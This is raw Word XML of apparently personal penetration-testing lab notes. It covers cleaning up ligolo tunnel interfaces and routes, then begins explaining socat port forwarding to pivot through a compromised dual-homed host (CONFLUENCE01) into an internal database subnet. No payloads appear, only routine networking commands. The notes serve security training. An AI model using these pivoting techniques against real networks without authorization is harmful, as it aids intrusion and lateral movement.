    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap del dev ligolo mode tun</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1411"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip tuntap del dev ligolo mode tun </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ completely delete the interface.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Ip Route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subnet&gt;/24 dev ligolo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">then do:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subnet&gt;/24 dev ligolo</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view routes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists all current routes on your machine, including the new ligolo one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view ip route:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link show</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w: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If you don’t see ligolo anymore, it’s gone.</w:t>
      </w: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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9887gbooaanj" w:id="68"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Redirection &amp; Port Forwarding</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t xml:space="preserve">Dynamic vs. Static Port Forwarding:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Static port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> forwarding only allows for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one port and one target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forwarding allows for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple ports and multiple target machines</w:t>
      </w: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F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ast28pb9g25y" w:id="69"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Forwarding with Socat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We want to interact with a port on a target machine (port 5432 on PGDATABASE01) but the machine is in a different subnet from our Kali. But, there is a dual-homed middleman (CONFLUENCE01) in both subnets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: we can also use port forwarding for machines on the same sub-net. For example, a target machine might have a firewall configured against our kali. So we have to pivot by port forwarding to a middle man who can directly access the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="883"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or this can be used when a target machine's service is only listening on loopback, so we can run socat on it and then make it port forward to itself to access service</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We run Socat on the "middle" man that has access to both subnets. And then we configure socat so that the middle man is listening on a single port, and then it re-directs that traffic to the desired port on the desired machine (PGDATABASE01). And then we just interact with that port on the middleman (CONFLUENCE01) in order to interact with the target machine (PGDATBASE01) from our Kali. </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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5373886" cy="2185988"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="355" name="image361.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image361.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5373886" cy="2185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7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, all machines are Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are trying to get from Kali to PGDATABASE01</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t xml:space="preserve">Once we reverse shell into CONFLUENCE01, then we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5456954" cy="3882833"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89" name="image82.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image82.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId178"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5456954" cy="3882833"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows us that CONFLUENCE01 has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">two network interfaces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ens192 and ens224. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens192</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the IP address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (underlined in blue). inet means IPv4. inet6 is IPv6. So this is the IPv4 address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens224</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the IP address </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (underlined in blue)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are curious, the IP addresses to the right of the above IP addresses (also in red), are the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">broadcast addresses</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.255</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.4.50.255 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are broadcast addresses. It’s a special IP address used to send a message to all devices on the same subnet. If you send a packet to 192.168.50.255, every device on the 192.168.50.0/24 subnet will receive i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now verify the current routing table using the ip route command to understand how traffic is being directed.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1765300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="128" name="image119.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image119.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This machine is dual-homed, with two network interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens192</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (name of a network interface) on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.0/24 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subnet, with gateway 192.168.50.254 (default route)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens224 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(name of a network interface) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnet, with optional gateway 10.4.50.254</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lzau8ewq6hm" w:id="70"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Socat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D9">
      <w:pPr>
